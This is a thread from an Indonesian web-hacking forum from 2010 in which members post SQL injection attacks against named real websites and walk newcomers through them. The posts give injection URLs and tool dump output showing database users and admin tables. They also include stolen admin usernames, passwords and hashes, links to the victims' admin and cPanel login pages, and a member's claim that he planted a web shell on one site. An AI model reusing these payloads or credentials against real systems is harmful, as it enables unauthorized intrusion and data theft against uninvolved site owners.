bug site post di sini

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Tue Mar 02, 2010 1:59 pm

culun2000 wrote:Permisi om-om yg ganteng, saya mau nanya nih maklum newbie, ini menandakan bug pada suatu website ya? http://www.milim.com/news.php?id=100%27
jika benar, trus ngelanjutin buat dapatin pass adminnya gimana OM
Tolong OM ajarin SQL injection dong OM, Maklum Om anak baru.... :pusing: :pusing: :pusing:
kalo untuk sy yang masi cupu ini, itu adalah bug...

next step nyari tau dulu berapa panjang kolomna.. make perintah
http://www.milim.com/news.php?id=100 order by 1--
trus sampe muncul error lagi

untuk lebih jelasna bisa langsung liat tutor di link ni
http://forum.xcode.or.id/viewtopic.php?f=99&t=35297
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

faojand injector
Posts: 3
Joined: Thu Mar 25, 2010 8:40 am

Re: bug site post di sini

Post by faojand injector » Thu Mar 25, 2010 9:06 am

adit_coolz wrote:

Code: Select all

[+] URL:http://www.duralee.com/trim/sku_treasure.php?Book_id=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: duralee_search
	User: [email protected]
	Version: 5.0.82-msl-usrs-sure2-log
[+] Dumping data from database "duralee_search" Table "Administrators"
[+] Column(s) ['user_id', 'username', 'user_password']
[+] Number of Rows: 3

[0] 60:ted:phpwork:
[1] 61:mark:phpwork:
[2] 62:duralee:duralee:duralee:
:devil
om cr yg kyag gituan gimana????? :pusing:

User avatar
ScootR_3086
Posts: 24
Joined: Sat Dec 08, 2007 9:24 am
Contact:

Re: bug site post di sini

Post by ScootR_3086 » Tue Mar 30, 2010 5:20 pm

http://dtincr.ph/news.php?id=1%20and%20 ... a.tables--
:mati: :mati:
ga ketemu..


http://www.resalemall.net/product_list. ... a.tables--

kok tabelnya dikit ya...salah dmana ga tau ni :cry: :cry: :cry:

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Tue Mar 30, 2010 6:24 pm


ni nama2 tabel dbna

accre,
accredit,
menu,
misc,
ncr_accre,
news,
permitNumbers,
pressrel_sections,
pressrelease,
speeches,
tbl_auth_user => (user_id,user_password)

hasilna ini
(admin:admin),webmaster:0c458fde308cd12d
:love: :love:

carana:

http://dtincr.ph/news.php?id=-1%20union ... uth_user--

=================================== eof ==================================
login formna ini bro
http://dtincr.ph/icc/login_form.php
nih untuk cpanelna
http://dtincr.ph:2082/login/
silahkan.
Last edited by peniru on Wed Mar 31, 2010 11:51 am, edited 1 time in total.
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
ecko
Posts: 112
Joined: Sat Mar 17, 2007 9:18 pm
Location: CianjuR
Contact:

Re: bug site post di sini

Post by ecko » Tue Mar 30, 2010 7:03 pm

Kk peniru....help me pliiis. Aq cuma baru bisa sampe sini :
http://www.unveilingafrica.org/news.php ... SE%28%29--

admin_users,articles,bd_boards,bd_msgs,gallery,management,mmail,news,trustees << itu nama tabel nya saja.

Mohon dibantu untuk tahap selanjutnya. Saya ingin tahu step by step setelah ini.
:circle: :circle: :circle:


Terima kasih

User avatar
ScootR_3086
Posts: 24
Joined: Sat Dec 08, 2007 9:24 am
Contact:

Re: bug site post di sini

Post by ScootR_3086 » Tue Mar 30, 2010 7:04 pm

woalah,,tabelnya yg itu ya.. :mati: :mati:
pantesan ga dapet2... ampe :pusing:
thank bro... :love: :love: :love:
cek tkp dlu yo...

User avatar
ScootR_3086
Posts: 24
Joined: Sat Dec 08, 2007 9:24 am
Contact:

Re: bug site post di sini

Post by ScootR_3086 » Tue Mar 30, 2010 7:38 pm

ecko wrote:Kk peniru....help me pliiis. Aq cuma baru bisa sampe sini :
http://www.unveilingafrica.org/news.php ... SE%28%29--

admin_users,articles,bd_boards,bd_msgs,gallery,management,mmail,news,trustees << itu nama tabel nya saja.

Mohon dibantu untuk tahap selanjutnya. Saya ingin tahu step by step setelah ini.
:circle: :circle: :circle:


Terima kasih

kalo ga salah ini ya..

http://www.unveilingafrica.org/news.php ... in_users--

8:Administrator:Admin:*3E2BF00785BD9BCA965B726E2906B4A523236E42

login kalo ga salah disini ya??
http://www.unveilingafrica.org:2082/login/

lanjutnya ga tau lagi dah gmana.. :mati: :mati:

bener ga ya...mohon koreksinya...

User avatar
ecko
Posts: 112
Joined: Sat Mar 17, 2007 9:18 pm
Location: CianjuR
Contact:

Re: bug site post di sini

Post by ecko » Tue Mar 30, 2010 7:56 pm

Terima kasih k ScootR_3086 atas bantuannya..... :love: :love: :love:
tapi ada yg aneh ma yang satu ini : 3E2BF00785BD9BCA965B726E2906B4A523236E42 <<< itu md5 bkn yah.
Coab dicrack juga hasilnya no result. Sedangkan itu kan password nya.
Oh iya k sebelum tahapan ini kan :
http://www.unveilingafrica.org/news.php ... in_users--
syntak untuk menampilkan atau untuk mengetahui id,rname,usr,pwd itu apa???
Mohon maaf aq banyak tanya kk.
:pusing: :pusing: :pusing:

User avatar
ScootR_3086
Posts: 24
Joined: Sat Dec 08, 2007 9:24 am
Contact:

Re: bug site post di sini

Post by ScootR_3086 » Tue Mar 30, 2010 8:33 pm

http://www.heart13.com/admin/index.php

user : admin
pass : admin998
:mati: :mati:

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Sat May 29, 2010 2:13 pm

[+] URL:http://www.isei.or.id/news.php?id=-5+un ... rkc0de,5--
[+] Gathering MySQL Server Configuration...
Database: wdewanto_isei
User: wdewanto_piping@localhost
Version: 5.1.45
[+] Dumping data from database "wdewanto_isei" Table "user"
[+] Column(s) ['user_name', 'user_password']

nih ane kasi shell yg dah ane tanem.... :devil :devil
moga2 dapat berguna wat semuana... :malumalu: :malumalu: :licik: :licik:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

Post Reply

Return to “Web Hacking”